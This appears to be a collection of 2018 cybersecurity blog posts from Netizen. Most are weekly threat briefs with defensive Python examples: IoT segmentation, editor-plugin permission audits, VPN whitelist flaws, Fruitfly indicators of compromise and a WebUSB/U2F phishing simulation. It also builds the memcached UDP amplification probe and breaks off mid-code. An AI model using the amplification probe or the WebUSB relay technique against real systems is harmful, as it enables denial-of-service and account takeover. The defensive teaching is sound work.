• Netizen Threat Brief: 21 March 2018 Edition

    Threats:

    Listed below is information regarding three of this week’s most critical threats and preventative measures to lessen the chances of a breach:

    1. IoT Risks in Healthcare
    2. Text Editors Plugin Vulnerability
    3. Leaky VPNs

    1. IoT Risks in Healthcare

    Overview

    The Internet of Things (IoT) is the collection of physical devices that are embedded with software, sensors, electronics and network connectivity, and that function by exchanging data with other connected devices, internet-based systems or other control systems. IoT is especially prevalent in the healthcare industry, where it is used for inventory tracking, medical devices (life support, inhalers, pacemakers and so on) and remote patient monitoring equipment, to name a few.

    Like anything connected to a network, these devices carry risk. IoT devices in the healthcare industry often lack proper security controls, if they have any at all. Healthcare organizations have a pressing need to protect their IoT devices from cyberattacks, since patients' lives are on the line should something go wrong.

    Recommendations

    Solutions for IoT devices are not always the easiest to implement—however there are actions that an organization can take to better protect their healthcare equipment and people:

    • Identify all IoT devices on the network, no matter how long they have been there. You cannot protect what you don't know is there.
    • Document each device's data flows to establish which connections are needed and which are unnecessary and add no value. With that knowledge the network can be segmented appropriately, firewalling off any traffic that is not required.
    • Control the acquisition and implementation process. Smart TVs, fridges and similar devices can open subtle channels for attackers to gain entry to the network. The well-known Target breach several years ago is the classic example of an overlooked third-party foothold: the attackers entered Target's network with credentials stolen from an HVAC contractor and went on to harvest payment card data from the point-of-sale systems.
    • Perform regular vulnerability assessments on internal and external networks to reveal hidden weaknesses or openings into the environment. Review these risks at regular intervals, implementing mitigation strategies as feasible.
    • Have a structured plan for the organization. Identify key stakeholders, establish security objectives, and coordinate actions to implement controls across the IoT spectrum.
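    As an added illustration of the second and third recommendations above (written for this page, not part of the original brief or Netizen's tooling), the following Python turns a documented flow list into a default-deny firewall policy and checks exported flow records against it. The device ranges, server addresses, ports, purposes and the flow records are constructed; the iptables syntax is real, but the rules sketch one enforcement point rather than a complete ruleset.

```python
"""Default-deny segmentation derived from documented IoT data flows.

Added example, not Netizen tooling. The device ranges, server addresses,
ports and flow records below are constructed for illustration."""
import ipaddress
from collections import namedtuple

Flow = namedtuple("Flow", "src dst proto port purpose")

# The documented, business-justified flows: the only traffic the segment needs.
DOCUMENTED_FLOWS = [
    Flow("10.20.0.0/24", "10.10.5.10/32", "tcp", 443, "infusion pumps -> pump management server"),
    Flow("10.20.0.0/24", "10.10.5.11/32", "udp", 123, "infusion pumps -> internal NTP"),
    Flow("10.30.0.0/24", "10.10.6.20/32", "tcp", 8883, "patient monitors -> MQTT broker"),
]


def flow_allowed(src_ip, dst_ip, proto, port, policy=DOCUMENTED_FLOWS):
    """Default deny: a connection is allowed only if a documented flow covers it."""
    src = ipaddress.ip_address(src_ip)
    dst = ipaddress.ip_address(dst_ip)
    for f in policy:
        if (src in ipaddress.ip_network(f.src) and dst in ipaddress.ip_network(f.dst)
                and proto == f.proto and port == f.port):
            return True
    return False


def render_rules(policy=DOCUMENTED_FLOWS):
    """Turn the documented flows into iptables FORWARD rules with a final catch-all DROP,
    so anything not documented is blocked rather than silently permitted."""
    rules = [f"iptables -A FORWARD -s {f.src} -d {f.dst} -p {f.proto} --dport {f.port} -j ACCEPT  # {f.purpose}"
             for f in policy]
    rules.append("iptables -A FORWARD -j DROP")
    return rules


def audit_observed(records, policy=DOCUMENTED_FLOWS):
    """records: lines of 'src dst proto dport bytes', as a flow collector might export.
    Returns the observed flows the policy would block; each is either undocumented
    business traffic (update the documentation) or something that should not be there."""
    unexpected = []
    for line in records.strip().splitlines():
        src, dst, proto, port, nbytes = line.split()
        if not flow_allowed(src, dst, proto, int(port), policy):
            unexpected.append((src, dst, proto, int(port), int(nbytes)))
    return unexpected


# Constructed flow records: two documented flows, one pump talking to the internet,
# and a patient monitor opening SSH to a pump.
OBSERVED = """
10.20.0.17 10.10.5.10 tcp 443 18210
10.20.0.17 10.10.5.11 udp 123 76
10.20.0.23 203.0.113.9 tcp 443 90210
10.30.0.5 10.10.6.20 tcp 8883 4410
10.30.0.5 10.20.0.17 tcp 22 1230
"""

if __name__ == "__main__":
    print("\n".join(render_rules()))
    for flow in audit_observed(OBSERVED):
        print("unexpected:", flow)
```

    The DROP rule at the end is what makes the documentation enforceable: a flow the owners forgot to write down shows up as a blocked connection and gets documented, instead of quietly persisting alongside the traffic nobody can explain.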

    2. Text Editors Plugin Vulnerability

    Overview

    Text editors like Sublime, Vim, Emacs, Gedit and pico/nano are used by developers, editors and writers to edit source files, configuration files and documents. Advanced editors such as these offer extensibility by allowing third-party plugins to be installed and run, extending the editor's functionality and scope.

    However, these editors do not adequately separate regular and elevated modes when loading plugins. Technical users often need to edit root-owned files and so launch the editor with elevated privileges (for example via sudo), yet the elevated editor still loads plugins and configuration from the invoking user's own, user-writable directories. Any process running as that regular user can plant a plugin there that executes the next time the editor is started as root, letting an attacker run code with root privileges and potentially take full control of the system.

    Recommendations

    Until editor developers change their folder and file permission models to fully separate regular from elevated operation, or provide a manual interface for users to approve plugins before they are loaded in an elevated session, we recommend:

    • Utilize a host-based intrusion detection system with file integrity monitoring, such as the open-source OSSEC. (Network and wireless sensors such as Snort and Kismet will not see a plugin being loaded from a local directory.)
    • Actively monitor system activity, file integrity, logs and processes.
    • If at all possible, avoid loading third-party plugins when the text editor is running with elevated permissions.
    • Deny non-elevated users write permission on the plugin and configuration directories an elevated editor will load; anything an editor reads as root should be owned by root and not writable by anyone else.
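    An added check for the last two recommendations (written for this page, not from the brief or from any editor project): it reports which of an editor's plugin and configuration locations a non-root user could modify, which is exactly what an editor started with sudo must not load. The listed paths are illustrative examples of where editors look, not a complete inventory of any editor's search order.

```python
"""Find editor plugin/config locations that a non-root user can modify, i.e. the
ones an editor started with sudo must not load. Added example; the path list is
illustrative and not a complete inventory of any editor's search paths."""
import os
import stat

TRUSTED_UID = 0        # root
TRUSTED_GIDS = {0}     # groups whose members are equivalent to root


def writable_by_untrusted(mode, uid, gid, trusted_uid=TRUSTED_UID, trusted_gids=TRUSTED_GIDS):
    """Reasons why something with these stat fields could be modified by someone
    other than root: owned by a non-root user, writable by a non-root group,
    or world-writable. An empty list means it is safe to trust as root."""
    reasons = []
    if uid != trusted_uid:
        reasons.append(f"owned by uid {uid}")
    if (mode & stat.S_IWGRP) and gid not in trusted_gids:
        reasons.append(f"writable by gid {gid}")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def ancestors(path):
    """The path and every directory above it. If any ancestor is user-writable the
    user can swap the whole subtree, so the leaf's own permissions are not enough."""
    path = os.path.abspath(path)
    chain = [path]
    while path != os.path.dirname(path):
        path = os.path.dirname(path)
        chain.append(path)
    return chain


def audit_paths(paths):
    """Map each existing path to the first untrusted component on the way to it.
    lstat is used so a symlink planted by the user is judged by its own owner,
    not by whatever it points at."""
    findings = {}
    for p in paths:
        if not os.path.lexists(p):
            continue
        for component in ancestors(p):
            st = os.lstat(component)
            reasons = writable_by_untrusted(st.st_mode, st.st_uid, st.st_gid)
            if reasons:
                findings[p] = (component, reasons)
                break
    return findings


# Locations an elevated editor may still read from the invoking user's home (illustrative).
EXAMPLE_PATHS = [
    os.path.expanduser("~/.vimrc"),
    os.path.expanduser("~/.vim/plugin"),
    os.path.expanduser("~/.emacs.d"),
    os.path.expanduser("~/.config/sublime-text-3/Packages"),
    "/usr/share/vim/vimfiles",
]

if __name__ == "__main__":
    for path, (component, why) in audit_paths(EXAMPLE_PATHS).items():
        print(f"do not load as root: {path} ({component}: {', '.join(why)})")
```

    Everything under the invoking user's home directory is flagged at the home directory itself, which is the point: the leaf file's permissions are irrelevant when the user owns a directory above it. Where the audit flags a path, run the editor as root only with a root-owned configuration, or use sudoedit, which edits a temporary copy as the invoking user and copies it back afterwards, so the editor itself never runs as root.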

    3. Leaky VPNs

    Overview

    Three popular VPN services were discovered to be leaking sensitive data. HotSpot Shield, PureVPN, and Zenmate contain vulnerabilities that could compromise a user’s privacy—including real IP addresses and their actual locations—allowing governments, hostile organizations, or other individuals to see this information.

    Three separate vulnerabilities were found in Hotspot Shield; the company has since fixed them in later updates:

    • Hijack all traffic (CVE-2018-7879): this vulnerability resided in Hotspot Shield's Chrome extension and could have allowed remote attackers to hijack and redirect a victim's web traffic to a malicious site.
    • DNS leak (CVE-2018-7878): a DNS leak in Hotspot Shield exposed users' original IP addresses to the DNS server, allowing ISPs to monitor and record their online activities.
    • Real IP address leak (CVE-2018-7880): this flaw poses a privacy threat because attackers can learn a user's real location and ISP. The issue occurred because the extension had a loose whitelist for "direct connection" (traffic allowed to bypass the VPN proxy). Researchers found that any domain containing "localhost", e.g. localhost.foo.bar.com, and the "type=a1fproxyspeedtest" parameter in the URL bypass the proxy and leak the real IP address.

    It should be noted that these vulnerabilities were found in Hotspot Shield's free Chrome extension, not in its desktop or smartphone apps. Similar vulnerabilities likely exist in the Chrome extensions of PureVPN and Zenmate, but they have not yet been formally disclosed and no patches have been released for them. Similar weaknesses may well exist in VPN services beyond the three listed here.
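    As an added example of the whitelist weakness behind CVE-2018-7880 (reconstructed for this page, not the extension's code): the loose rule below does substring matching on the raw URL, as the description above implies. Whether the original required both tokens or either one is not stated, so treating either as sufficient is an assumption; the allow-list of hosts is also assumed. The strict rule beside it parses the URL and compares the exact hostname, which is the shape a PAC file or extension proxy rule should take.

```python
"""A proxy 'direct connection' whitelist done loosely and done strictly.

Added example, not code from the extension. The loose rule is reconstructed from
the description in this brief as substring checks on the raw URL; treating either
token as sufficient is an assumption. The allow-list of hosts is also assumed."""
from urllib.parse import urlsplit

# Hosts the VPN client may legitimately reach without the tunnel (assumed).
DIRECT_HOSTS = {"localhost", "127.0.0.1", "speedtest.vpnvendor.example"}


def loose_should_bypass(url):
    """Reconstructed weak rule: string matching against the whole URL. Anything the
    attacker controls (subdomain labels, query string) can satisfy it."""
    return "localhost" in url or "type=a1fproxyspeedtest" in url


def strict_should_bypass(url):
    """Parse the URL and compare the exact hostname against the allow-list.
    Query-string contents and substrings of the host never influence routing."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    return host in DIRECT_HOSTS


# Constructed probes: an attacker only needs the browser to fetch one such URL
# (for example as an image on a page) for the request to leave via the real IP.
PROBES = [
    "http://localhost/",                                    # genuinely local
    "http://localhost.foo.bar.com/",                        # attacker's domain with 'localhost' in it
    "http://attacker.example/?type=a1fproxyspeedtest",      # attacker's URL with the speed-test token
    "https://speedtest.vpnvendor.example/run",              # the real speed test host
    "https://example.com/",                                 # ordinary browsing
]


def compare(urls=PROBES):
    """For each URL: (loose rule says bypass, strict rule says bypass)."""
    return {u: (loose_should_bypass(u), strict_should_bypass(u)) for u in urls}


if __name__ == "__main__":
    for url, (loose, strict) in compare().items():
        print(f"{url:55} loose={loose!s:5} strict={strict!s:5}")
```

    The two attacker probes are routed direct by the loose rule and through the tunnel by the strict one, while the genuine local and speed-test URLs behave the same under both. In a PAC file the same logic is written in JavaScript against the host argument rather than the url argument; the lesson carries over unchanged.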

    Recommendations

    If using any of these services, we recommend:

    • Check with the vendor on the status of the vulnerabilities: have they been fixed? Is anything being done?
    • Do not use the Chrome extensions associated with these services; they are not secure.
    • If using Hotspot Shield, apply current patches.

    For the time being, discontinue VPN services with Zenmate and PureVPN—at least until patches have been released for the leaks.

    How can Netizen help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.


  • Cybersecurity By The Numbers: Market Estimates, Forecasts, And Surveys

    What is the state of the cybersecurity industry and practice today? Recent surveys and analysis provide fresh insights, from senior management and board of directors not taking cyber threats seriously enough, IoT and mobile security deficiencies, the perennial cybersecurity skills shortage, new types of attacks on consumers and businesses, and the increasing threat of a global cyber war.

    These old and new cybersecurity challenges make 2018 yet another year of “more of everything.” But it will also be the year in which the fact that security and privacy are two sides of the same coin will be reinforced, driving significant changes in cybersecurity practices. In “60 cybersecurity predictions for 2018” I wrote, “Like death and taxes, there are only two safe predictions about cybersecurity in 2018: There will be more spectacular data breaches and the EU General Data Protection Regulation (GDPR) will go into effect on May 25.” ESG’s Jon Oltsik wrote today: “Data privacy officers and CISOs should re-investigate whether they are truly ready for GDPR. If your organization doesn’t have automated and auditable processes to find, delete, and verify data erasure at scale, the answer is definitely, ‘no.’”


  • Netizen Threat Brief: 14 March 2018 Edition

    Threats:

    Listed below is information regarding three of this week’s most critical threats and preventative measures to lessen the chances of a breach:

    1. Fruitfly/Quimitchin Malware
    2. Chrome WebUSB Vulnerability
    3. Slingshot Router Vulnerability

    1. Fruitfly/Quimitchin Malware

    Overview

    The Fruitfly malware, found primarily on macOS systems, uses antiquated code that has helped it run undetected, and it has been reported attacking biomedical research institutions. Some of its code also shows signs of being able to run on Linux.

    Fruitfly, detected as OSX.Backdoor.Quimitchin, is used to access user information, log keystrokes to gather credentials, and pivot into other systems and services. It consists of just two files: a hidden script that communicates with the command-and-control servers, takes screenshots and reports system uptime, and a second component that keeps the malware's icon out of the macOS Dock. The malware's primary purpose is to capture screenshots and gain webcam access.

    The antiquated code Fruitfly relies on includes calls to the long-deprecated QuickTime Sequence Grabber API: SGGetChannelDeviceList, SGSetChannelDevice, SGSetChannelDeviceInput and SGStartRecord.

    Recommendations

    Fruitfly's known attack vectors are externally exposed remote-access services:

    • Apple Filing Protocol (AFP, port 548)
    • Screen Sharing/VNC and RDP
    • SSH (port 22)
    • Back to My Mac (BTMM)

    The following are network indicators of Fruitfly/Quimitchin presence:

    • eidk.duckdns.org
    • h8cnq8.duckdns.org
    • hh4de2.duckdns.org
    • hlkmm2.duckdns.org
    • hnqi24.duckdns.org
    • fejose2.duckdns.org
    • fovdim2.duckdns.org
    • eidk.hopto.org
    • eutq.hopto.org
    • tmp1.hopto.org
    • tmp2.hopto.org
    • h8cnq8.hopto.org
    • hh4de2.hopto.org
    • hlkmm2.hopto.org
    • hnqi24.hopto.org
    • fejose2.hopto.org
    • fovdim2.hopto.org

    Mac host-based indicators:

    • ~/Library/LaunchAgents/com.client.client.plist
    • ~/Library/LaunchAgents/com.adobe.ARM.<16 random alphanumeric characters>.plist
    • ~/.tmp
    • ~/.client
    • ~/fpsaud
    • ~/Library/Application Support/<16 random alphanumeric characters>
    • ~/.cr or ~/.cr2

    Windows host-based indicators:

    • The directory %PROGRAMFILES%\Sophos Suite for NT\
    • A custom (per infection) executable named 'SAVCleanupService.exe' or 'SAVservice.exe'
    • C:\a.exe
    • C:\ab.exe
    • C:\client.exe

    Our recommendations vary with the network in question; however, system credentials should be strong, complex and rotated at regular intervals, and the remote-access services listed above should not be exposed to the internet without need. It is also important to keep antivirus software up to date for the best possible chance of catching malware. A vulnerability assessment of the local network in its entirety would also help to discover deeply rooted malware such as this that may be hiding unnoticed.
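    An added example that applies the indicators above (written for this page, not Netizen's or the malware researchers' code): it scans resolver log lines for the C2 hostnames and a macOS home directory for the host indicators, including the two entries with random components. The log lines are constructed; the indicator lists are copied from this brief and nothing else is assumed about the malware.

```python
"""Apply the Fruitfly/Quimitchin indicators: scan resolver or proxy log lines for
the C2 hostnames and a macOS home directory for the host indicators.

Added example, not Netizen's or the malware researchers' code. The log lines are
constructed; the indicator lists are copied from the brief above."""
import os
import re

C2_HOSTS = {
    "eidk.duckdns.org", "h8cnq8.duckdns.org", "hh4de2.duckdns.org", "hlkmm2.duckdns.org",
    "hnqi24.duckdns.org", "fejose2.duckdns.org", "fovdim2.duckdns.org",
    "eidk.hopto.org", "eutq.hopto.org", "tmp1.hopto.org", "tmp2.hopto.org",
    "h8cnq8.hopto.org", "hh4de2.hopto.org", "hlkmm2.hopto.org", "hnqi24.hopto.org",
    "fejose2.hopto.org", "fovdim2.hopto.org",
}
# Any host on the two dynamic-DNS providers the C2 uses; each match is checked against the list.
HOST_RE = re.compile(r"\b([a-z0-9-]+\.(?:duckdns|hopto)\.org)\b", re.I)

# Host indicators relative to the user's home directory.
FIXED_PATHS = [
    "Library/LaunchAgents/com.client.client.plist",
    ".tmp", ".client", "fpsaud", ".cr", ".cr2",
]
# Indicators with a random 16-character alphanumeric component: (directory, filename pattern).
# The Application Support pattern is weak on its own; treat a hit as a lead, not a verdict.
RANDOM_PATTERNS = [
    ("Library/LaunchAgents", re.compile(r"^com\.adobe\.ARM\.[A-Za-z0-9]{16}\.plist$")),
    ("Library/Application Support", re.compile(r"^[A-Za-z0-9]{16}$")),
]


def scan_log(text):
    """Return (line number, host, kind) where kind is 'c2' for a listed hostname and
    'dyndns' for another host on the same providers, which is worth a second look
    because the C2 names rotate on them."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for host in HOST_RE.findall(line):
            host = host.lower()
            hits.append((lineno, host, "c2" if host in C2_HOSTS else "dyndns"))
    return hits


def scan_home(home):
    """Return the host indicators present under a home directory (empty if none)."""
    found = []
    for rel in FIXED_PATHS:
        if os.path.lexists(os.path.join(home, rel)):
            found.append(rel)
    for subdir, pattern in RANDOM_PATTERNS:
        directory = os.path.join(home, subdir)
        if os.path.isdir(directory):
            for name in os.listdir(directory):
                if pattern.match(name):
                    found.append(os.path.join(subdir, name))
    return found


# Constructed BIND-style query log: one C2 lookup per infected host and two benign names.
SAMPLE_LOG = """\
Mar 14 09:12:01 resolver named[311]: client 10.0.4.22#53211: query: hh4de2.duckdns.org IN A
Mar 14 09:12:03 resolver named[311]: client 10.0.4.22#53212: query: updates.example.com IN A
Mar 14 09:12:08 resolver named[311]: client 10.0.4.31#53110: query: tmp1.hopto.org IN A
Mar 14 09:12:09 resolver named[311]: client 10.0.4.31#53111: query: safe.duckdns.org IN A
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    for rel in scan_home(os.path.expanduser("~")):
        print("host indicator present:", rel)
```

    Run scan_home against every user's home directory on a suspect Mac, not only the current one, since the launch agent lives under the infected user's Library folder.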

    2. Chrome WebUSB Vulnerability

    Overview

    Multifactor authentication (MFA) is widely used as an added layer of security for logins. A common example is logging into a work account and, after entering the password, receiving a verification notification on a phone by app or text message to confirm the sign-in. While that method is common, there are many others, one of which is a hardware security key such as the YubiKey.

    A YubiKey is a physical token, inserted into a USB port much like a regular key. To log in, a user enters their credentials, plugs in the YubiKey and physically presses it to gain access, meaning nobody can log into the account without the key. Because the key's response is bound to the site that requested it, this is highly effective against phishing. Sounds secure, right?

    A newer browser feature in Google Chrome, known as WebUSB, can be abused to bypass that protection for a victim using a YubiKey.

    With a carefully crafted phishing website, an attacker can trick a victim into typing their username and password, which is standard phishing, but can then send a request directly from the malicious site to the victim's YubiKey and use the key's response to unlock the victim's account on the real service.

    Recommendations

    WebUSB allows websites to communicate directly with USB devices. Until the issue is addressed, we recommend:

    • If feasible, do not use hardware tokens such as the YubiKey in Chrome
    • Verify that the sites you are using are legitimate. It is worth noting that the attacker must get the victim to grant the site WebUSB access to the YubiKey through Chrome's permission prompt, as well as to physically touch the key. Do not grant that access to a site you do not trust.
    • Be aware of phishing attempts, which often appear as trustworthy emails whose contents may be intimidating or even threatening, asking for account or billing updates and claiming a consequence if the request is not met.
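    An added simulation (written for this page, not the researchers' code) of why a U2F key defeats an ordinary phishing page and why a page with raw USB access does not. It follows the FIDO U2F raw message layout, in which the key signs the application parameter, a user-presence byte, a counter and the challenge parameter, and the challenge parameter is the hash of client data that names the requesting origin. Two simplifications are assumptions: an HMAC under a shared secret stands in for the key's ECDSA signature and key handle, and the browser's facet check is reduced to "the page origin must equal the app ID". The site names and secret are constructed.

```python
"""Why a U2F key resists ordinary phishing, and what a direct USB channel changes.

Added example, not the researchers' code. HMAC under a shared secret replaces the
key's ECDSA signature; the browser's facet check is simplified to origin == app ID."""
import hashlib
import hmac
import json
import os
import struct


def sha256(data):
    return hashlib.sha256(data).digest()


class SimKey:
    """The hardware token. It never sees an origin; it only signs what it is given."""

    def __init__(self, secret):
        self.secret = secret
        self.counter = 0

    def authenticate(self, app_param, challenge_param):
        self.counter += 1                       # usage counter, lets the server spot replays/clones
        signed = app_param + b"\x01" + struct.pack(">I", self.counter) + challenge_param
        return signed, hmac.new(self.secret, signed, hashlib.sha256).digest()


def client_data(challenge, origin):
    return json.dumps({"typ": "navigator.id.getAssertion", "challenge": challenge,
                       "origin": origin}, separators=(",", ":")).encode()


class RelyingParty:
    APP_ID = "https://bank.example"            # constructed

    def __init__(self, key_secret):
        self.key_secret = key_secret            # registered key (stands in for its public key)
        self.last_counter = 0

    def new_challenge(self):
        return os.urandom(16).hex()

    def verify(self, challenge, cdata, signed, sig):
        cd = json.loads(cdata)
        if cd.get("origin") != self.APP_ID or cd.get("challenge") != challenge:
            return False                        # origin binding: phishing pages fail here
        if signed[:32] != sha256(self.APP_ID.encode()) or signed[-32:] != sha256(cdata):
            return False
        counter = struct.unpack(">I", signed[33:37])[0]
        if counter <= self.last_counter:
            return False                        # replay
        if not hmac.compare_digest(hmac.new(self.key_secret, signed, hashlib.sha256).digest(), sig):
            return False
        self.last_counter = counter
        return True


def browser_u2f_sign(key, page_origin, challenge, app_id):
    """The normal U2F API path: the browser writes the real page origin into the client
    data and refuses app IDs the page is not allowed to use. The page cannot lie."""
    if page_origin != app_id:
        return None
    cdata = client_data(challenge, page_origin)
    signed, sig = key.authenticate(sha256(app_id.encode()), sha256(cdata))
    return cdata, signed, sig


def webusb_sign(key, claimed_origin, challenge, app_id):
    """The page talks to the key over raw USB instead: it builds the client data itself,
    so it can claim the real site's origin while being served from anywhere."""
    cdata = client_data(challenge, claimed_origin)
    signed, sig = key.authenticate(sha256(app_id.encode()), sha256(cdata))
    return cdata, signed, sig


def phish(via_webusb):
    """The phishing page relays the bank's challenge to the victim's key and the answer back."""
    secret = b"constructed-registered-key-secret"
    key, rp = SimKey(secret), RelyingParty(secret)
    challenge = rp.new_challenge()
    if via_webusb:
        result = webusb_sign(key, rp.APP_ID, challenge, rp.APP_ID)
    else:
        result = browser_u2f_sign(key, "https://bank-login.example",
                                  challenge, rp.APP_ID)
    return result is not None and rp.verify(challenge, *result)


def legitimate_login():
    """Genuine site, then a replay of the same assertion: (first accepted, replay accepted)."""
    secret = b"constructed-registered-key-secret"
    key, rp = SimKey(secret), RelyingParty(secret)
    challenge = rp.new_challenge()
    result = browser_u2f_sign(key, rp.APP_ID, challenge, rp.APP_ID)
    return rp.verify(challenge, *result), rp.verify(challenge, *result)
```

    The browser-mediated path fails twice over: the facet check refuses the foreign app ID, and even without it the origin written into the client data would not match the bank's. The WebUSB path succeeds because the page, not the browser, wrote the client data. That is why the permission prompt matters: it is the only point at which the victim can stop the raw USB channel from opening.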

    3. Slingshot Router Vulnerability

    Overview

    A new cyber-threat known as Slingshot is a cyber-espionage campaign that compromises routers and uses them as a launch pad to attack computers within the network, collecting screenshots, keystrokes, network data, passwords, USB connections, other desktop activity, clipboard data and more; because it runs in the kernel, it can steal whatever it wants. The campaign uses a wide variety of tools and techniques, making it far more complex than most malware.

    When an administrator configures a compromised router, the router's management software downloads and runs the malicious module on the administrator's computer. How the routers themselves were initially compromised is currently unknown.

    Once the administrator's machine is infected, Slingshot downloads a range of additional modules, most notably Cahnadr and GollumApp, which work together to gather information. Cahnadr in particular is a kernel-mode program that executes malicious code without crashing the system, while GollumApp is the user-mode component. The complexity of Slingshot is indicative of a highly organized group, if not a state-sponsored one.

    Recommendations

    Individual victims appear to be the main focus rather than organizations, although some government institutions have also been targeted. Current research suggests that MikroTik routers are the only devices affected, although some victims could have been infected through other means.

    We recommend that all MikroTik users upgrade their routers to the latest firmware version as soon as possible. Other brands of routers should be upgraded as well, and antivirus software kept current. Finally, workstations and servers should be patched accordingly, as vulnerable services on these systems may also have allowed Slingshot to enter the network.


  • Allentown, PA: Netizen Corporation, an award-winning provider of cyber security and related solutions for government and commercial markets, has formally promoted Raymond M. “Ray” Harris, Jr. to Vice President (VP) of Operations. Ray joined Netizen in 2015 as a Program Manager after a successful 30-year career with a Fortune 500 company supporting nuclear operations and, later, corporate information technology where he managed IT infrastructure operations across all of that company’s North American facilities.

    At Netizen, Ray manages a portfolio of defense, government and commercial cybersecurity programs that provide support to customers around the world. As a Vice President, Ray now officially joins the core senior executive team of Netizen in managing components of company-wide operations. He is responsible for ensuring the efficient execution of all projects with high quality and customer satisfaction as well as the compliance of company operations with pertinent regulatory, contractual, and other requirements or standards.

    “Ray has quickly become a key resource for managing the rapidly expanding defense, civilian government and commercial divisions of our company. This promotion recognizes his hard work, success, and the tremendous value that his operations management experience brings to bear for customer engagements around the world,” said Mike Hawkins, Netizen’s Chief Executive Officer. He added that Ray will continue to work out of Netizen’s Allentown, PA headquarters and manage a wide range of customer sites, employee locations, and Netizen offices across 12 states and growing.

    Netizen has been awarded over $12,000,000 in contracts to provide cyber security and related solutions to the federal government in the past two years. They also provide these solutions to state government, municipal, and commercial customers to aid in maintaining the security and compliance of mission-critical IT infrastructure.

    About Netizen Corporation: Named the Lehigh Valley’s “Emerging Business of the Year” in 2015 and a recipient of Department of Defense (DoD) awards for superior customer service, Netizen is an Allentown, Pennsylvania based Service Disabled Veteran-Owned Business (SDVOSB) specializing in cyber security, compliance, and software assurance for defense, federal, and commercial markets. Their CyberSecure Solutions™ products and services are trusted to monitor and protect critical infrastructure in a cost-effective manner. Learn more at https://www.NetizenCorp.com.


  • That Time Of Year Again: Cisco Systems Releases Its Annual Cybersecurity Report

    Last week, Cisco Systems released the 2018 edition of its Annual Cybersecurity Report (ACR) you can find here. The report, compiled from a survey of 3,600 chief security officers (CSOs) and security operations leaders from across the globe, seeks to highlight emerging threats in the rapidly evolving landscape of cybersecurity. With 53% of all attacks resulting in damages of $500,000 or more (according to this year’s report), it’s obviously important to keep a finger on the pulse of cybercrime as it is a constantly moving target. As I noted in last year’s recap, these annual reports are well-regarded in the industry, even by Cisco Systems’ competitors—they always take a measured, industry-focused look at the state of affairs, and are not openly slanted towards driving Cisco Systems sales. Yes, what they are saying maps nicely to their security portfolio, but if it didn’t, you would have to scratch your head and ask “why not”. Here are my takeaways from this year’s report.


  • Netizen Threat Brief: 7 March 2018 Edition

    Threats

    Listed below is information regarding three of this week’s most critical threats and preventative measures to lessen the chances of a breach:

    1. Adobe Acrobat Reader DC Remote Code Execution
    2. Misconfigured Memcached Servers
    3. WordPress ionCube Malware

    1. Adobe Acrobat Reader DC Remote Code Execution

    Overview

    A remote code execution vulnerability has been discovered in Adobe Acrobat Reader DC that can be triggered when a victim opens a malicious PDF file or visits a web page crafted to deliver one.

    Malicious JavaScript hidden inside the PDF uses the document ID field to perform unauthorized operations and trigger a stack-based buffer overflow when the file is opened; an attacker can leverage the flaw to corrupt sensitive data or execute arbitrary code. This vulnerability poses a serious threat because Adobe Acrobat Reader is by far the most popular PDF reader, with a large user base; it is often the default PDF reader on a system and also integrates with web browsers as a plugin for rendering PDF documents.

    Recommendations

    Affected Adobe Acrobat Reader versions include:

    • 009.20050
    • 011.30070
    • 006.30394
    • And earlier versions

    Adobe has released security updates for Adobe Acrobat and Reader, and we recommend applying those updates as soon as possible.

    It is also important to exercise good end-user awareness:

    • Examine your emails
    • Hover over links and attachments—when you hover over a link, a small window pops up to show you where the link really goes. If the real link doesn’t match the sender or doesn’t match what you expect, assume it is poisoned and don’t click it.
    • Do you know the sender? Verify with that person directly that they really sent it.

    2. Misconfigured Memcached Servers

    Overview

    Cybercriminals have long used denial of service (DoS) and distributed denial of service (DDoS) attacks, which paralyze networks and systems by flooding them with enormous amounts of traffic. Recently, attackers have been leveraging misconfigured memcached servers to amplify these attacks by as much as 51,200 times. Memcached is an in-memory key-value cache used to improve the responsiveness of database-driven websites.

    Attackers send a small UDP request, only a few bytes long, to a memcached server on port 11211. The packets are spoofed to appear to come from the intended target of the DDoS attack, so the memcached server sends its massively disproportionate response to the spoofed target.

    Recommendations

    If using memcached servers, we recommend:

    • Disable UDP support if you are not using it; it is enabled by default in memcached releases before 1.5.6.
    • Ensure that your memcached servers are firewalled from the internet and bound to an internal or loopback address only.
    • Block port 11211 UDP and TCP at the perimeter.
    • Developers of other software should likewise stop using UDP, or at least stop enabling it by default.

    Any protocol that does use UDP should respond with a strictly smaller packet than the request it received; otherwise it can be abused for amplification.
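    As an added example for the recommendations above (written for this page; not an attack tool and not Netizen's code), the following Python builds the 15-byte UDP "stats" probe that the amplification attacks use, measures the amplification factor from whatever datagrams come back, and audits a memcached command line for UDP exposure. The only function that sends packets is probe(), for use against hosts you own; everything else runs offline on a constructed reply.

```python
"""memcached UDP amplification: build the 15-byte 'stats' probe attackers use,
measure the amplification factor from the datagrams that come back, and audit
a memcached command line for UDP exposure.

Added example, not an attack tool. probe() sends real packets and is only for
hosts you own; everything else runs offline on constructed data."""
import re
import socket
import struct


def udp_frame(request_id, seq, total, payload):
    """memcached UDP framing: 8-byte header (request id, sequence number, number of
    datagrams in the message, reserved) followed by the text protocol command."""
    return struct.pack(">HHHH", request_id, seq, total, 0) + payload


def stats_probe(request_id=0):
    return udp_frame(request_id, 0, 1, b"stats\r\n")     # 8 + 7 = 15 bytes on the wire


def parse_frame(datagram):
    request_id, seq, total, _reserved = struct.unpack(">HHHH", datagram[:8])
    return request_id, seq, total, datagram[8:]


def amplification_factor(request, responses):
    """Bytes received for one request divided by bytes sent. A protocol is safe
    against reflection only if this is at most 1."""
    return sum(len(r) for r in responses) / len(request)


def audit_command_line(cmdline):
    """Inspect memcached's arguments (from ps, a unit file or memcached.conf lines).
    UDP is on unless '-U 0' is given; before 1.5.6 it was on by default."""
    args = " ".join(line.split("#", 1)[0] for line in cmdline.splitlines())
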